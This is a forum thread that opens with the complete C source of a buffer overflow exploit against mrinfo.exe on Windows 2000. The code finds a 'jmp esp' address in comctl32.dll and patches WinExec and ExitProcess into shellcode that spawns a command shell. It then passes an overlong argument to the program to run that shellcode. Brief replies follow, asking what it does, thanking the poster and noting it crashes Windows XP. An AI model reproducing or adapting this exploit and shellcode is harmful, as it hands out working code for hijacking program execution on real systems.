here is the code:
/**********************************************************************/
/* [*] EDUCATIONAL PURPOSE ONLY DOESN'T GIVE ANY ADMIN RIGHTS [*] */
/**********************************************************************/
/** mrinfo.exe exploit for win2k only (winXP causes an exception **/
/** when it jumps to the jmp esp offset [in comctl32.dll] why?). **/
/**********************************************************************/
/******************** coded by Scurt && kralor ************************/
/*********************** comments by kralor ***************************/
/******************** http://www.coromputer.net ***********************/
/*********************** undernet #coromputer *************************/
/**********************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <conio.h>
#include <windows.h>
#define RET_DLL "comctl32.dll"
#define EXE "mrinfo.exe"
/***********************************************************************/
/**** int hardcore(char *buffer, char *lib, char *function, int pos) ***/
/***********************************************************************/
/* Function that puts the offset of a function from */
/* a dll into a buffer at the desired place. */
/***********************************************************************/
/* by kralor */
/***********************************************************************/
int hardcore(char *buffer,char *library,char *function, int pos)
{
void *pfunc;
HMODULE llib;
llib=LoadLibrary(library);
if(!llib)
return -1;
pfunc=GetProcAddress(llib,function);
if(!pfunc)
return -2;
buffer[pos]=((char *)&pfunc) [0];
buffer[pos+1]=((char *)&pfunc) [1];
buffer[pos+2]=((char *)&pfunc) [2];
buffer[pos+3]=((char *)&pfunc) [3];
return 0;
}
/***********************************************************************/
/**** char *scan_dll(char *lib) ***/
/***********************************************************************/
/* Function that scans a dll looking for the famous 2 opcodes */
/* jmp esp (0xff && 0xe4) and returns the offset */
/***********************************************************************/
/* by Scurt */
/***********************************************************************/
char *scan_dll(char *lib)
{
char nret[10]={0};
char *ret;
HMODULE offset;
BOOL end = FALSE;
int i=0;
int y;
offset=LoadLibrary(lib);
if(!offset)
return 0;
ret=(char*)malloc(10);
while(!end)
{
/* 0xff && 0xe4 == jmp esp */
/* 0xff && 0xd4 == call esp */
if((( BYTE *)offset)[i] == 0xff && (( BYTE *)offset)[i+1] == 0xe4)
{
sprintf(ret,"%x",&(( BYTE *)offset)[i]);
end= TRUE;
}
i++;
}
for(y=0;y<10;y++)
{
nret[y]=ret[y]-48;
if(nret[y]>10){
switch((nret[y]-33))
{
case 16:
nret[y]=0x0a;
break;
case 17:
nret[y]=0x0b;
break;
case 18:
nret[y]=0x0c;
break;
case 19:
nret[y]=0x0d;
break;
case 20:
nret[y]=0x0e;
break;
case 21:
nret[y]=0x0f;
break;
}

}

}
memset(ret,0,sizeof(ret));
ret[0]=nret[0]*0x10+nret[1];
ret[1]=nret[2]*0x10+nret[3];
ret[2]=nret[4]*0x10+nret[5];
ret[3]=nret[6]*0x10+nret[7];
return ret;
}
int main(void)
{
char *ret;
char buffer[128];
char* pbuffer;
char* pshellcode;
HMODULE mod;
/*
the shellcode in C looks like this:
WinExec("cmd",SW_SHOW);
ExitProcess(0x69);
huh..
*/
char shellcode[]= /* only a simple shellcode to spawn a shell */
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\xEB\x14" /* jmp there --- */
/*here: <---|- */
"\x58" /* pop eax || */
"\x6A\x05" /* push 0x05 || */
"\x50" /* push eax ("cmd") || */
"\xB8\x69\x69\x69\x69" /* mov eax, 69696969h || */
"\xFF\xD0" /* call eax (WinExec) || */
"\x6A\x69" /* push 0x69 || */
"\xB8\x69\x69\x69\x69" /* mov eax, 69696969h || */
"\xFF\xD0" /* call eax (ExitProcess) || */
/*there: <--| */
"\xE8\xEB\xFF\xFF\xFF" /* call here ---- */
"\x63\x6D\x64"; /* "cmd" */
printf("[*] Getting WinExec && ExitProcess addresses ...");
if(hardcore(shellcode,"kernel32.dll","WinExec", 24)) {
printf("error: unable to find WinExec function ...\r\n");
return -1;
}

if(hardcore(shellcode,"kernel32.dll","ExitProcess", 33)) {
printf("error: unable to find ExitProcess function ...\r\n");
return -1;
}
printf("Done\r\n");
mod=LoadLibrary("kernel32.dll");
printf("WinExec : 0x%x\r\n",GetProcAddress(mod,"WinExec"));
printf("ExitProcess: 0x%x\r\n",GetProcAddress(mod,"ExitProcess"));
printf("[*] Searching 'jmp esp' opcodes in %s ...",RET_DLL);
ret=scan_dll(RET_DLL);
if(!ret) {
printf("error: unable to find 'jmp esp' opcodes in %s\r\n",RET_DLL);
return 1;
}
printf("Done\r\n");
printf("jmp esp : 0x%x%x%x%x\r\n",(unsigned char)ret[0],(unsigned char)ret[1],(unsigned char)ret[2],(unsigned char)ret[3]);
pbuffer=&buffer[0];
pshellcode=&shellcode[0];
sprintf(pbuffer,"%s -i AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%c%c%c%c%s",EXE,ret[3],ret[2],ret[1],ret[0],pshellcode);
printf("[*] Executing shellcode through %s ...",EXE);
system(buffer);
printf("Done\r\n");
Sleep(1000);
return 0;
}

can u plz explain what it does? plz plz...

Cuz i dunno lol

THX. for this nice one....

C'ya

thx m8n

i will try ...

^^ not any use for kiddies ^^ hmm that binary is the debug version
isn't it ^^ mine is 40kb release version ... btw nice way to crash mrinfo on XP ^^

yes i will test it this is a great tools! thanks for sharing

ok for what you need compiled version? it doesnt do anything... yet...
and yeah it preety much bangs up winxp

but more info what vulnrability this code exploits? for what used comctl32.dll in the system?